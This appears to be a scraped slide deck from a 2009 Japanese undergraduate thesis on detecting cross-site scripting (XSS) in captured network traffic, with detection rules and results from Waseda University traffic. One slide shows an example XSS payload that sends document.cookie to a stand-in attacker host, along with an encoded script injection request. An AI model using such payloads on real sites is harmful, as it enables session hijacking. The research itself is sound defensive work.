卒業論文発表 「 web アクセスに伴う脅威の特徴分析」
DESCRIPTION
卒業論文発表 「 Web アクセスに伴う脅威の特徴分析」. 後藤研究室 1G05R191-9 米山 諒. 研究背景. インターネットの普及に伴い,クロスサイトスクリプティング (XSS), Phishing, SQL-Injection など Web 上の脆弱性が問題視されている。. 脆弱性を持つサイトが数多く存在する。 未対応のまま放置されているものもある。. Web サーバ側の対応だけでは十分ではない。. 研究目的. 増加傾向にある Web 上の脆弱性による脅威を防ぐために, Web サーバの外で対策を行う。 - PowerPoint PPT PresentationTRANSCRIPT
後藤研究室1G05R191-9 米山 諒
2009/2/4卒業論文発表 1
インターネットの普及に伴い,クロスサイトスクリプティング (XSS), Phishing, SQL-Injection など Web 上の脆弱性が問題視されている。
2009/2/4卒業論文発表 2
脆弱性を持つサイトが数多く存在する。 未対応のまま放置されているものもある。
Web サーバ側の対応だけでは十分ではない。
増加傾向にある Web 上の脆弱性による脅威を防ぐために, Web サーバの外で対策を行う。
クライアント側の対策では,ユーザの操作や設定によって機能を無効化してしまう恐れがある。
2009/2/4卒業論文発表 3
サーバとクライアントの中継地点での対策を提案する。
2009/2/4卒業論文発表 4
<HTML><BODY>
<B>Web Page Content</B>The JavaScript code within the URL is echoed by the website and executed in the users browser.<SCRIPT>var img = new Image();Img.src = ‘http://hacker.com/’ +document.cookie;</SCRIPT></BODY></HTML>
悪意のあるスクリプトを含んだ URIhttp://victim.com/foo.cgi?q= <html_javascript_exploit_code>
click
10.19.19.1 – “GET / HTTP/1.1” 200 8110.19.19.1 – “GET / HTTP/1.1” 200 8110.19.19.1 – “GET / HTTP/1.1” 200 8110.19.19.1 – “GET / HTTP/1.1” 200 8110.19.19.1 – “GET / HTTP/1.1” 200 8110.19.19.1 – “GET / HTTP/1.1” 200 8110.19.19.1 – “GET / HTTP/1.1” 200 8110.19.19.1 – “GET / HTTP/1.1” 200 8110.19.19.1 – “GET /cookie_data HTTP/1.1” 200 33510.19.19.1 – “GET / HTTP/1.1” 200 8110.19.19.1 – “GET / HTTP/1.1” 200 8110.19.19.1 – “GET / HTTP/1.1” 200 8110.19.19.1 – “GET / HTTP/1.1” 200 8110.19.19.1 – “GET / HTTP/1.1” 200 8110.19.19.1 – “GET / HTTP/1.1” 200 81
Cookie を盗まれてセッションハイジャックされる。
意図しない Web サイトの機能を実行される。 ページの任意の部分を変更される。 DoS 攻撃に利用される。 Phishing ( フィッシング詐欺 ) に利用される。 マルウェアをダウンロードさせられる。
2009/2/4卒業論文発表 5
2009/2/4卒業論文発表 6
ネットワーク上を流れるトラフィックデータを利用して,クロスサイトスクリプティング (XSS) の検知を行う。1. tcpdump のデータから HTTP ヘッダを抽出する。2. HTTP ヘッダから GET メソッドを抽出する。3. GET メソッドで渡される引数を解析して検知する。イーサネッ
トヘッダ
IP ヘッダ TCP ヘッダ
アプリケーションデータ
イーサネット
トレーラ
メッセージヘッダー
空行 (CR+LF)
メッセージボディ
2009/2/4卒業論文発表 7
GET /xss.cgi?form=%3Cscript%3Ealert(XSS)%3C
%2Fscript%3EHost: www.exsample.comAccept: text/html;Accept-Language: ja, en-us;Accept-Encoding: gzip,defateAccept-Charset: Shift_JIS,utf-8;Cookie: SSID=123abc
HTTPリクエスト(スクリプトの抽入)
攻撃者
一般ユーザ
WebサーバHTTPリクエスト
HTTPリクエスト
レスポンス
1. サンプルデータによる提案手法の検知精度◦ XSSed – XSS (Cross-Site Scripting) information
and vulnerable websites archive http://www.xssed.com/
◦ XSS Workshop http://blogged-on.de/xss/
◦ XSS Challenges http://xss-quiz.int21h.jp/
2. 実際のトラフィックデータへ提案手法の適用◦ 早稲田大学のトラフィックデータを利用する。
2009/2/4卒業論文発表 8
提案手法 A の検知ルール◦ <script> タグ◦ javascript: によるスクリプト◦ onClick イベント◦ onMouseOver イベント
検知手法 B の検知ルール◦ <script> タグ◦ javascript: によるスクリプト◦ イベントハンドラ ( 正規表現によるマッチング )
2009/2/4卒業論文発表 9
2009/2/4卒業論文発表 10
CapturingMachine
Router
Internet
Router
Waseda
Network
パケット数
GET メソッド 提案手法 A 提案手法 B
1,004,804
76,116 5,016 5,066
2009/2/4卒業論文発表 11
パケット数は HTTP パケットの総数 GET メソッドには画像ファイルなどの呼び出し
を含む
<script> タグ◦ エンコードで隠ぺいしたスクリプトの検知が可能であ
った。
Javascript: によるスクリプト◦ 確実に検知できることを確認できた。
イベントハンドラ◦ 属性値が「’」もしくは「” 」で囲まれているものを検知
できた。
2009/2/4卒業論文発表 12
2009/2/4卒業論文発表 13
まとめ サーバとクライアントの中継地点の対策を提案し
た。 HTTP ヘッダ中の GET メソッドの特徴を利用
することで,クロスサイトスクリプティング (XSS) の検知が可能であることを示した。
今後の課題 検知の精度 ( 見逃しと誤検知 ) リアルタイムでの検知
2009/2/4卒業論文発表 14
2009/2/4卒業論文発表 15
Snort◦ TCP, UDP, ICMP, IP の解析を行うことができる。◦ 上記以外のプロトコルについては記録のみを行う。
Proxy サーバ◦ Proxy サーバを利用して, HTTP プロトコルを解析す
る。◦ HTML 文章まで解析することで検知を行うことができ
る。
2009/2/4卒業論文発表 16
メソッド 内容GET リソースの取得POST エンティティボディの転送PUT ファイルの転送HEAD メッセージヘッダーの取得DELETE ファイルの削除
OPTIONSサポートしているメソッドの問い合わせ
TRACE 経路の調査CONNECT プロキシへのトンネリング要求
2009/2/4卒業論文発表 17
GET http://www.exsample.com/ HTTP/1.1 リクエストラインAccept: image/gif, image/x-xbitmap, image/jpeg,, */* Accept-Language: ja User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept-Encoding: gzip, deflate Host: www.exsample.com
Proxy-Connection: Keep-Alive各種ヘッダーフィール
ド空行 (CR+LF)
2009/2/4卒業論文発表 18
HTTP/1.0 200 OK ステータスラインDate: Wed, 22 Sep 2004 05:21:33 GMT Server: Apache Last-Modified: Fri, 28 May 2004 12:27:38 GMT
Etag: "6eb21-291-40b7303a" Accept-Ranges: bytes Content-Length: 657 Content-Type: text/html
Proxy-Connection: keep-alive各種ヘッダーフィー
ルド空行 (CR+LF) <html> <head> ・・・ </html> メッセージボディ
2009/2/4卒業論文発表 19
ハンドラ名 イベントの発生するタイミングonBlur フォーカスが外れたときonClick クリックされたときonChange フィールドの内容が変更されたときonFocus フォーカスされたときonLoad 読み込みが完了したときonMouseOver
要素上にマウスカーソルが重なったとき
onSelect フィールドが選択されたときonSubmit フォームの内容を送信したときonUnload 別ページに移動するとき
2009/2/4卒業論文発表 20
表示 実体参照 UTF-8& & %25< < %3C> > %3E" " %22‘ ' %27
2009/2/4卒業論文発表 21
2009/2/4卒業論文発表 22
Web ServerClient PC
HTTP リクエスト
レスポンス
Internet